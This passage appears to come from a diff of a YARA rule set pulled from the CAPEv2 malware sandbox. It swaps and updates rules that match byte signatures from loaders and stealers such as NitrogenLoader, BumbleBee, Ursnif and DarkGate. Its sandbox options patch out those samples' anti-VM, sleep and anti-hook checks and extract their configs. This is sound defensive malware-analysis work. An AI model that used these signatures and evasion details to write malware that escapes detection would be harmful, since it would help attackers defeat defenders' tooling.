+		logic_hash = "00a3e4e80a2558ee52035f091e2339fa2dad6f6515b9dc099f2f3800e4c70bce"
+		score = 75
+		quality = 70
+		tags = "FILE"
+		cape_options = "bp0=$trap-13,action0=ret,count=0"
+
+	strings:
+		$trap = {6A 50 6A 14 6A 03 5A 8D 4C 24 ?? E8 [4] 68 [4] 68 [4] E8 [4] 85 C0 74 05}
+
+	condition:
+		uint16( 0 ) == 0x5A4D and $trap
+}
+rule CAPE_Loadersyscall
+{
+	meta:
+		description = "Loader Syscall"
+		author = "enzok"
+		id = "45193b38-938e-55cf-9ea0-7bd48f0d77e4"
+		date = "2024-10-29"
+		modified = "2025-07-23"
+		reference = "https://github.com/kevoreilly/CAPEv2"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/analyzer/windows/data/yara/NitrogenLoader.yar#L1-L13"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "3c7ffd8b95032cffecff7fa7e5f5f561cce13e1109f6a9b30bc743642b495e45"
 		score = 75
 		quality = 70
 		tags = ""
-		cape_options = "clear,sysbp=$syscall*-2"
-		packed = "075d0dafd7b794fbabaf53d38895cfd7cffed4a3fe093b0fc7853f3b3ce642a4"
+		cape_options = "sysbp=$syscall*-2,count=0"
 
 	strings:
-		$syscall = {48 31 C0 4C 8B 19 8B 41 10 48 8B 49 08 49 89 CA 41 FF E3}
+		$makehashes = {48 89 4C 24 ?? 48 89 54 24 ?? 4? 89 44 24 ?? 4? 89 4C 24 ?? 4? 83 EC ?? B? [4] E8 [3] 00}
+		$number = {49 89 C3 B? [4] E8 [3] 00}
+		$syscall = {48 83 C4 ?? 4? 8B 4C 24 ?? 4? 8B 54 24 ?? 4? 8B 44 24 ?? 4? 8B 4C 24 ?? 4? 89 CA 4? FF E3}
 
 	condition:
-		any of them
+		all of them
 }
-rule CAPE_Hijackloaderstub
+rule CAPE_Nitrogenloaderaes
 {
 	meta:
-		description = "HijackLoader Stub Executable"
-		author = "kevoreilly"
-		id = "53363a3a-7f2a-52a6-8c0a-5f03fd121f70"
-		date = "2026-01-26"
-		modified = "2026-01-26"
+		description = "NitrogenLoader AES and IV"
+		author = "enzok"
+		id = "c79a00af-52f9-5f07-9c58-e8964e70986f"
+		date = "2024-10-29"
+		modified = "2025-07-23"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/analyzer/windows/data/yara/HijackLoader.yar#L1-L13"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "686a19a416b94f6ccdd1891ff027452c84b2171ee4268ff971f490e18948a6f5"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/analyzer/windows/data/yara/NitrogenLoader.yar#L15-L27"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "de8ed0e98948cfadfd579e334fd9ce9f777ddbd988de897529ba71cb5eb2d396"
 		score = 75
 		quality = 70
 		tags = ""
-		cape_options = "dump-limit=0,dump"
+		cape_options = "bp0=$keyiv0+8,action0=dump:ecx::64,hc0=1,bp1=$keyiv0*-4,action1=dump:ecx::32,hc1=1,count=0"
 
 	strings:
-		$stub1 = {50 83 C0 10 50 56 8D 85 [4] 50 E8 [4] 83 C7 30 8D 85 [4] 3B F8 74 08 8B 35 [4] EB D3}
-		$stub2 = {33 C5 89 45 ?? (C6 45 ?? 00|C7 45 ?? 61 7A 2D 2D) 8D 45 ?? FF 75 ?? C7 45 ?? 30 39 41 5A 50 8D 45 (??|?? C7 45 ?? 61 7A 2D 2D) 50 E8}
-		$app = "\\app-" wide
+		$keyiv0 = {48 8B 8C 24 [4] E8 [3] 00 4? 89 84 24 [4] 4? 8B 84 24 [4] 4? 89 84 24 [4] 4? 8B 8C 24 [4] E8 [3] 00}
+		$keyiv1 = {48 89 84 24 [4] 4? 8B 84 24 [4] 4? 8B 94 24 [4] 4? 8D 8C 24 [4] E8 [3] FF}
+		$keyiv2 = {48 63 84 24 [4] 4? 8B C0 4? 8B 94 24 [4] 4? 8D 8C 24 [4] E8 [3] FF 4? 8B 84 24}
 
 	condition:
-		2 of them
+		all of them
 }
-rule CAPE_Singlestepantihook
+rule CAPE_Nitrogenloaderbypass
 {
 	meta:
-		description = "Single-step anti-hook Bypass"
-		author = "kevoreilly"
-		id = "f7aca40b-d231-543b-81f3-5f4524abab78"
-		date = "2021-08-26"
-		modified = "2021-08-26"
+		description = "Nitrogen Loader Exit Bypass"
+		author = "enzok"
+		id = "397b0b79-d569-5a71-bcac-ce0d64f706e6"
+		date = "2024-10-29"
+		modified = "2025-07-23"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/analyzer/windows/data/yara/SingleStepAntiHook.yar#L1-L11"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "fc9f36b0ecc13192fe8b6caaff256ac52c1f14480223d629a38ba84e90dd0809"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/analyzer/windows/data/yara/NitrogenLoader.yar#L29-L41"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "3a034d3ddd18723ea1f91814c8c2a2c47a749dfd1496a5d4777d8ff8bfab3457"
 		score = 75
 		quality = 70
 		tags = ""
-		cape_options = "bp0=$antihook+6,action0=skip,count=0"
+		cape_options = "bp2=$exit-2,action2=jmp,count=0"
 
 	strings:
-		$antihook = {FF D? 83 EC 08 9C 81 0C 24 00 01 00 00 9D}
+		$string1 = "LoadResource"
+		$syscall = {48 83 C4 ?? 4? 8B 4C 24 ?? 4? 8B 54 24 ?? 4? 8B 44 24 ?? 4? 8B 4C 24 ?? 4? 89 CA 4? FF E3}
+		$exit = {33 C9 E8 [4] E8 [4] 48 8D 84 24 [4] 48 89 44 24 ?? 4? B? E4 00 00 00 4? 8B 05 [4] B? 03 00 00 00 48 8D}
 
 	condition:
-		any of them
+		all of them
 }
-rule CAPE_Darkgateloader
+rule CAPE_Nitrogenloaderconfig
 {
 	meta:
-		description = "DarkGate Loader"
+		description = "NitrogenLoader Config Extraction"
 		author = "enzok"
-		id = "feb90ae6-ec01-59da-a3df-217df2133588"
-		date = "2023-08-09"
-		modified = "2025-04-07"
+		id = "0c8d0655-0592-52b5-b51d-3acdb15a4864"
+		date = "2024-10-29"
+		modified = "2025-07-23"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/analyzer/windows/data/yara/DarkGateLoader.yar#L1-L15"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "00692123615d2f7eaf8aea07754fc9439cf58e1fb8eb4f44f0428b362f27e794"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/analyzer/windows/data/yara/NitrogenLoader.yar#L43-L66"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "06d49ebf3f67476c83a77734dff0245a51027a35d92e5af07bb9146db5b156ca"
 		score = 75
 		quality = 70
 		tags = ""
-		cape_options = "bp0=$decrypt1+30,bp0=$decrypt2+29,action0=dump:eax::ebx,bp1=$decrypt3+80,action1=dumpsize:eax,bp2=$decrypt3+124,hc2=1,action2=dump:eax,count=0"
-		packed = "b15e4b4fcd9f0d23d902d91af9cc4e01417c426e55f6e0b4ad7256f72ac0231a"
+		cape_options = "bp0=$decrypt1*+1,bp1=$key*,hc0=1,count=0,action0=string:rcx,action1=string:rdx,typestring=NitrogenLoader Config"
 
 	strings:
-		$loader = "loader"
-		$decrypt1 = {B? 01 00 00 00 8B [3] E8 [4] 8B D7 32 54 [4] 88 54 18 FF 4? 4? 75}
-		$decrypt2 = {B? 01 00 00 00 8B [2] E8 [4] 8B D7 2B D3 [4] 88 54 18 FF 4? 4? 75}
-		$decrypt3 = {89 85 [4] 8B 85 [4] 8B F0 8D BD [4] B? 10 [3] F3 A5 8B 85 [4] 33 D2 [2] 8B 85 [4] 99}
+		$decrypt1 = {48 63 4? 24 ?? 33 D2 48 [0-3] F7 B4 24 [4] 48 8B C2 48 8B 8C 24 [4] 0F BE 04 01}
+		$decrypt2 = {8B ?? 24 [1-4] 33 C8 8B C1 48 63 4C 24 ?? 48 8B 94 24 [4] 88 04 0A}
+		$decrypt3 = {8B 8C 24 ?? ?? ?? ?? 2B C8 8B C1 48 63 4C 24 ?? 48 8B 94 24 [4] 88 04 0A}
+		$key = {74 ?? E8 [4] 85 C0 75 ?? 4? 8B 0D [3] 00 4? 8D 15 [3] 00 E8}
+		$taskman_1 = {E8 [4] B9 61 00 00 00 88 84 24 [4] E8 [4] B9 73 00 00 00 88 84 24 [4] E8 [4] B9 6B 00 00 00 88 84 24 [4] E8 [3] FF}
+		$taskman_2 = {B9 4D 00 00 00 88 84 24 [4] E8 [4] B9 61 00 00 00 88 84 24 [4] E8 [4] B9 6E 00 00 00 88 84 24 [4] E8 [3] FF}
+		$taskman_3 = {B9 61 00 00 00 88 84 24 [4] E8 [4] B9 67 00 00 00 88 84 24 [4] E8 [4] B9 65 00 00 00 88 84 24 [4] E8 [3] FF}
+		$taskman_4 = {B9 72 00 00 00 88 84 24 [4] E8 [4] 31 C9 88 84 24 [4] E8 [3] FF}
+		$installers_1 = {B9 49 00 00 00 E8 [4] B9 6E 00 00 00 88 84 24 [4] E8 [4] B9 73 00 00 00 88 84 24 [4] E8 [3] FF}
+		$installers_2 = {B9 74 00 00 00 88 84 24 [4] E8 [4] B9 61 00 00 00 88 84 24 [4] E8 [4] B9 6C 00 00 00 88 84 24 [4] E8 [3] FF}
+		$installers_3 = {B9 6C 00 00 00 88 84 24 [4] E8 [4] B9 65 00 00 00 88 84 24 [4] E8 [3] FF}
+		$installers_4 = {B9 72 00 00 00 88 84 24 [4] E8 [4] B9 73 00 00 00 88 84 24 [4] E8 [3] FF}
+		$rc4decrypt_1 = {48 89 ?? 4? 89 ?? E8 [4] 4? 8B ?? 24 [1-4] 4? 89 ?? 4? 89 ?? 4? 89 C1 [0-1] 89 ?? E8 [4] 4? 89}
+		$rc4decrypt_2 = {E8 [4] 8B ?? 24 [1-4] 4? 89 ?? 48 89 ?? 4? 89 C1 E8 [3] FF}
 
 	condition:
-		$loader and any of ( $decrypt* )
+		any of ( $decrypt* ) or ( $key and ( 3 of ( $taskman_* ) or 3 of ( $installers* ) and 1 of ( $rc4decrypt_* ) ) )
 }
 rule CAPE_Guloaderprecursor : FILE
 {
@@ -62497,8 +62133,8 @@ rule CAPE_Guloaderprecursor : FILE
 		date = "2020-12-29"
 		modified = "2023-10-02"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/analyzer/windows/data/yara/Guloader.yar#L17-L28"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/analyzer/windows/data/yara/Guloader.yar#L17-L28"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
 		logic_hash = "ea05c352739366a03da302074b01537382ba26f7fd5049004f156e47d284f070"
 		score = 75
 		quality = 70
@@ -62512,57 +62148,137 @@ rule CAPE_Guloaderprecursor : FILE
 	condition:
 		2 of them and not uint16( 0 ) == 0x5A4D
 }
-rule CAPE_Mysterysnail
+rule CAPE_Privateloader
 {
 	meta:
-		description = "MysterySnail anti-sandbox bypass"
+		description = "PrivateLoader indirect syscall capture"
 		author = "kevoreilly"
-		id = "dfeb820a-3101-5588-8348-3b62a6900538"
-		date = "2021-10-16"
-		modified = "2021-10-16"
+		id = "3a0b16da-ec84-5761-bcf2-106362c5667d"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/analyzer/windows/data/yara/MysterySnail.yar#L1-L11"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "9402dbbbfdd286e2309ee83fc08194f70f73657a3a4e3785dfbcb564dbee86a8"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/analyzer/windows/data/yara/PrivateLoader.yar#L1-L12"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "204a86bb3743f19fed0fe55ff5ccd716661f7f315b5966a29e434ccb3e160526"
 		score = 75
 		quality = 70
 		tags = ""
-		cape_options = "bp0=$anti+62,action0=skip,count=0"
+		cape_options = "clear,sysbp=$syscall*-2"
+		packed = "075d0dafd7b794fbabaf53d38895cfd7cffed4a3fe093b0fc7853f3b3ce642a4"
 
 	strings:
-		$anti = {F2 0F 10 [3] 66 0F 2F 05 [4] 76 0A 8B [3] FF C0 89 [3] B9 5B 05 00 00 FF 15 [4] E8 [4] 89 [3] 8B [3] 8B [3] 2B C8 8B C1 3B [3] 7E 16}
+		$syscall = {48 31 C0 4C 8B 19 8B 41 10 48 8B 49 08 49 89 CA 41 FF E3}
 
 	condition:
 		any of them
 }
-rule CAPE_Blister : FILE
+rule CAPE_Bumblebee : FILE
 {
 	meta:
-		description = "Blister Sleep Bypass"
-		author = "kevoreilly"
-		id = "34657bab-f100-5ea8-9111-da2806f46b79"
-		date = "2022-05-10"
-		modified = "2024-05-09"
+		description = "BumbleBee Anti-VM Bypass"
+		author = "enzo & kevoreilly"
+		id = "85e2c9fd-86de-57c8-99ec-de2cc3996876"
+		date = "2022-04-21"
+		modified = "2023-02-08"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/analyzer/windows/data/yara/Blister.yar#L1-L17"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "aba379b93c85241cf250829832b2c8a5eaafb3abd0ff955dbaf0d06489c00deb"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/analyzer/windows/data/yara/BumbleBee.yar#L34-L46"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "0a632a0b30b28d544880eb1cfdd85e95f455c343d60f8d6922d4196ef7415961"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_options = "bp0=$sleep1+6,bp1=$sleep2+7,action0=setsignflag,action1=clearcarryflag,count=3"
-		packed = "0a7778cf6f9a1bd894e89f282f2e40f9d6c9cd4b72be97328e681fe32a1b1a00"
-		packed = "afb77617a4ca637614c429440c78da438e190dd1ca24dc78483aa731d80832c2"
+		cape_options = "bp0=$antivm1+2,bp1=$antivm2+2,bp1=$antivm3+38,action0=jmp,action1=skip,count=0,force-sleepskip=1"
 
 	strings:
-		$sleep1 = {FF FF 83 7D F0 00 (E9|0F 8?)}
-		$sleep2 = {81 7D D8 90 B2 08 00 (E9|0F 8?)}
-		$protect = {50 6A 20 8D 45 ?? 50 8D 45 ?? 50 6A FF FF D7}
-		$lock = {56 33 F6 B9 FF FF FF 7F 89 75 FC 8B C1 F0 FF 45 FC 83 E8 01 75 F7}
-		$comp = {6A 04 59 A1 [4] 8B 78 04 8B 75 08 33 C0 F3 A7 75 0B 8B 45 0C 83 20 00 33 C0 40 EB 02 33 C0}
+		$antivm1 = {84 C0 74 09 33 C9 FF [4] 00 CC 33 C9 E8 [3] 00 4? 8B C8 E8}
+		$antivm2 = {84 C0 0F 85 [2] 00 00 33 C9 E8 [4] 48 8B C8 E8 [4] 48 8D 85}
+		$antivm3 = {33 C9 E8 [4] 48 8B C8 E8 [4] 83 CA FF 48 8B 0D [4] FF 15 [4] E8 [4] 84 c0}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 2 of ( $protect , $lock , $comp ) and all of ( $sleep* )
+		uint16( 0 ) == 0x5A4D and any of them
+}
+rule CAPE_Ursnifv3
+{
+	meta:
+		description = "Ursnif Config Extraction"
+		author = "kevoreilly"
+		id = "4170b638-e51b-59c6-956a-50ff82f629ba"
+		date = "2021-06-17"
+		modified = "2023-03-23"
+		reference = "https://github.com/kevoreilly/CAPEv2"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/analyzer/windows/data/yara/UrsnifV3.yar#L1-L16"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "d679546e37ee58087fce75920b2ce4e6d2b9ae55fb1ef80d14ec14309396757c"
+		score = 75
+		quality = 70
+		tags = ""
+		cape_options = "br0=$crypto32_1-48,action1=dump:ebx::eax,bp2=$crypto32_3+50,action2=dump:ebx::eax,bp3=$crypto32_4+11,action3=dump:eax::ecx,typestring=UrsnifV3 Config,count=1"
+		packed = "75827be0c600f93d0d23d4b8239f56eb8c7dc4ab6064ad0b79e6695157816988"
+		packed = "5d6f1484f6571282790d64821429eeeadee71ba6b6d566088f58370634d2c579"
+
+	strings:
+		$crypto32_1 = {8B C3 83 EB 01 85 C0 75 0D 0F B6 16 83 C6 01 89 74 24 14 8D 58 07 8B C2 C1 E8 07 83 E0 01 03 D2 85 C0 0F 84 AB 01 00 00 8B C3 83 EB 01 85 C0 89 5C 24 20 75 13 0F B6 16 83 C6 01 BB 07 00 00 00}
+		$crypto32_3 = {F6 46 03 02 75 5? 8B 46 10 40 50 E8 [4] 8B D8 89 5C 24 1C 85 DB 74 41 F6 46 03 01 74 53 8B 46 10 89 44 24 1C 8B 46 0C 53 03 C7 E8 [4] 59}
+		$crypto32_4 = {C7 44 24 10 01 00 00 00 8B 4E 10 C6 04 08 00 8B 4D ?? 89 01 8B 46 ?? 8B 4D ?? 89 01 8B 44 24 10 5F 5E 5B 8B E5 5D C2 0C 00}
+		$cpuid = {8B C4 FF 18 8B F0 33 C0 0F A2 66 8C D8 66 8E D0 8B E5 8B C6 5E 5B 5D C3}
+
+	condition:
+		any of ( $crypto32* ) and $cpuid
+}
+rule CAPE_Vbcrypter
+{
+	meta:
+		description = "VBCrypter anti-hook Bypass"
+		author = "kevoreilly"
+		id = "2e010dfd-5096-5e81-af9b-174322a47d87"
+		date = "2021-03-28"
+		modified = "2021-03-28"
+		reference = "https://github.com/kevoreilly/CAPEv2"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/analyzer/windows/data/yara/VBCrypter.yar#L1-L11"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "a62bca62ab624ab1a2c2e612c5b7e6d543006026a49c07c46800499e31e41c4e"
+		score = 75
+		quality = 70
+		tags = ""
+		cape_options = "bp0=$antihook-12,action0=jmp,count=0"
+
+	strings:
+		$antihook = {43 39 C3 0F 84 ?? 00 00 00 80 3B B8 75 ?? 83 7B 01 00 75 ?? 80 7B 05 BA 75 ?? 8B 53 06 83 C3 0A 31 C9}
+
+	condition:
+		any of them
+}
+rule CAPE_Gettickcountantivm
+{
+	meta:
+		description = "GetTickCountAntiVM bypass"
+		author = "kevoreilly"
+		id = "d90b9768-0525-5963-9817-e3a53b1d4cf3"
+		date = "2021-12-14"
+		modified = "2022-02-25"
+		reference = "https://github.com/kevoreilly/CAPEv2"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/analyzer/windows/data/yara/GetTickCountAntiVM.yar#L1-L20"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		hash = "662bc7839ed7ddd82d5fdafa29fafd9a9ec299c28820fe4104fbba9be1a09c42"
+		hash = "00f1537b13933762e1146e41f3bac668123fac7eacd0aa1f7be0aa37a91ef3ce"
+		hash = "549bca48d0bac94b6a1e6eb36647cd007fed5c0e75a0e4aa315ceabdafe46541"
+		hash = "90c29a66209be554dfbd2740f6a54d12616da35d0e5e4af97eb2376b9d053457"
+		logic_hash = "9cdb0b2d2e058e1858c2f2baad67005a2019fbbdcb7ca54571c8d20dfbf33471"
+		score = 75
+		quality = 70
+		tags = ""
+		cape_options = "bp0=$antivm1-13,bp0=$antivm5-40,bp0=$antivm6,action0=wret,hc0=1,bp1=$antivm2-6,action1=wret,hc1=1,count=1,bp2=$antivm3+42,action2=jmp:96,bp3=$antivm4-9,action3=wret,hc3=1"
+
+	strings:
+		$antivm1 = {57 FF D6 FF D6 BF 01 00 00 00 FF D6 F2 0F 10 0D [4] 47 66 0F 6E C7 F3 0F E6 C0 66 0F 2F C8 73}
+		$antivm2 = {F2 0F 11 45 ?? FF 15 [4] 6A 00 68 10 27 00 00 52 50 E8 [4] 8B C8 E8 [4] F2 0F 59 45}
+		$antivm3 = {0F 57 C0 E8 [4] 8B 35 [4] BF 01 00 00 00 FF D6 F2 0F 10 0D [4] 47 66 0F 6E C7 F3 0F E6 C0 66 0F 2F C8 73}
+		$antivm4 = {F2 0F 11 45 EC FF 15 [4] 8B DA 8B C8 BA [4] 89 5D FC F7 E2 BF [4] 89 45 F4 8B F2 8B C1 B9}
+		$antivm5 = {BB 01 00 00 00 8B FB 90 FF 15 [4] FF C7 66 0F 6E C7 F3 0F E6 C0 66 0F 2F F8 73 EA}
+		$antivm6 = {48 81 EC 88 00 00 00 0F 57 C0 F2 0F 11 44 [2] F2 0F 10 05 [4] F2 0F 11 44 [2] F2 0F 10 05 [4] F2 0F 11}
+
+	condition:
+		any of them
 }
 rule CAPE_Darkgate
 {
@@ -62573,8 +62289,8 @@ rule CAPE_Darkgate
 		date = "2024-02-26"
 		modified = "2024-02-26"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/analyzer/windows/data/yara/DarkGate.yar#L1-L17"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/analyzer/windows/data/yara/DarkGate.yar#L1-L17"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
 		hash = "c1d35921f4fc3bac681a3d5148f517dc0ec90ab8c51e267c8c6cd5b1ca3dc085"
 		logic_hash = "25c0e77a83676c6a18445f8df0b1f7a9148de5f64eeb532f9a4f4d4652dd8191"
 		score = 75
@@ -62593,1859 +62309,1757 @@ rule CAPE_Darkgate
 	condition:
 		($alphabet ) and ( any of ( $part* ) or all of ( $config* ) )
 }
-rule CAPE_Aurastealerbypass
+rule CAPE_Rdtscpantivm
 {
 	meta:
-		description = "Bypass AuraStealer"
-		author = "enzok"
-		id = "e510f46b-de7c-50d1-bff3-97c3acf0452e"
-		date = "2025-09-02"
-		modified = "2025-09-02"
+		description = "RdtscpAntiVM bypass"
+		author = "kevoreilly"
+		id = "11dc634b-1e2f-55b4-be60-98e51de42d43"
+		date = "2021-12-11"
+		modified = "2021-12-11"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/analyzer/windows/data/yara/AuraStealer.yar#L1-L14"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "ae174c96c262b1734c58bd6c5f7112221b08596c180612e4970acada35dbd070"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/analyzer/windows/data/yara/RdtscpAntiVM.yar#L1-L11"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "be0f9b52fb630730a38160f4ad2d50b6b4bea5edd82e3ea4d1e257cf7b090910"
 		score = 75
 		quality = 70
 		tags = ""
-		cape_options = "bp0=$antivm1+3,action0=skip,count=0"
-		packed = "a9c47f10d5eb77d7d6b356be00b4814a7c1e5bb75739b464beb6ea03fc36cc85"
+		cape_options = "nop-rdtscp=1"
 
 	strings:
-		$antivm1 = {39 04 11 0f 94 C3 8B 44 ?? ?? 85 C0}
-		$conf = {8D BE ?? 00 00 00 68 00 40 00 00 5? 5? FF D1 83 C4 ?? 8B 07 8B 57 04 29 C2}
-		$keyexpansion = {31 C0 8A 1C 82 88 1C 81 8A 5C 82 01 88 5C 81 01 8A 5C 82 02 88 5C 81 02 8A 5C 82 03 88 5C 81 03 4? 83 F8 08 75 ?? B? 08 00 00 00}
+		$antivm = {46 0F 01 F9 [0-4] 66 0F 6E C6 F3 0F E6 C0 66 0F 2F ?? 73}
 
 	condition:
-		all of them
+		any of them
 }
-rule CAPE_Loadersyscall
+rule CAPE_Socks5Systemz : FILE
 {
 	meta:
-		description = "Loader Syscall"
-		author = "enzok"
-		id = "45193b38-938e-55cf-9ea0-7bd48f0d77e4"
-		date = "2024-10-29"
-		modified = "2025-07-23"
+		description = "Socks5Systemz config extraction"
+		author = "kevoreilly"
+		id = "ef14953a-2b48-54f4-8d15-c07c7459103e"
+		date = "2024-05-22"
+		modified = "2025-05-23"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/analyzer/windows/data/yara/NitrogenLoader.yar#L1-L13"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "3c7ffd8b95032cffecff7fa7e5f5f561cce13e1109f6a9b30bc743642b495e45"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/analyzer/windows/data/yara/Socks5Systemz.yar#L1-L19"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "7e324bacd1ea57585435b6a5a4c93bda63ca146c100f2361a1c5530b87668299"
 		score = 75
 		quality = 70
-		tags = ""
-		cape_options = "sysbp=$syscall*-2,count=0"
+		tags = "FILE"
+		cape_options = "br0=user32::wsprintfA,br1=ntdll::sprintf,action2=string:[esp],action3=string:[esp],count=0,typestring=Socks5Systemz Config"
+		packed = "9b997d0de3fe83091726919a0dc653e22f8f8b20b1bb7d0b8485652e88396f29"
 
 	strings:
-		$makehashes = {48 89 4C 24 ?? 48 89 54 24 ?? 4? 89 44 24 ?? 4? 89 4C 24 ?? 4? 83 EC ?? B? [4] E8 [3] 00}
-		$number = {49 89 C3 B? [4] E8 [3] 00}
-		$syscall = {48 83 C4 ?? 4? 8B 4C 24 ?? 4? 8B 54 24 ?? 4? 8B 44 24 ?? 4? 8B 4C 24 ?? 4? 89 CA 4? FF E3}
+		$chunk1 = {0F B6 84 8A [4] E9 [3] (00|FF)}
+		$chunk2 = {0F B6 04 8D [4] E9 [3] (00|FF)}
+		$chunk3 = {66 0F 6F 05 [4] E9 [3] (00|FF)}
+		$chunk4 = {F0 0F B1 95 [4] E9 [3] (00|FF)}
+		$chunk5 = {83 FA 04 E9 [3] (00|FF)}
+		$chunk6 = {8A 04 8D [4] E9 [3] (00|FF)}
+		$chunk7 = {83 C4 04 83 C4 04 E9}
+		$chunk8 = {83 C2 04 87 14 24 5C E9}
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5A4D and 5 of them
 }
-rule CAPE_Nitrogenloaderaes
+rule CAPE_Modiloader : FILE
 {
 	meta:
-		description = "NitrogenLoader AES and IV"
-		author = "enzok"
-		id = "c79a00af-52f9-5f07-9c58-e8964e70986f"
-		date = "2024-10-29"
-		modified = "2025-07-23"
+		description = "ModiLoader detonation shim"
+		author = "kevoreilly"
+		id = "64f9aa51-d668-5d40-9781-c26970acf781"
+		date = "2023-10-19"
+		modified = "2025-01-31"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/analyzer/windows/data/yara/NitrogenLoader.yar#L15-L27"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
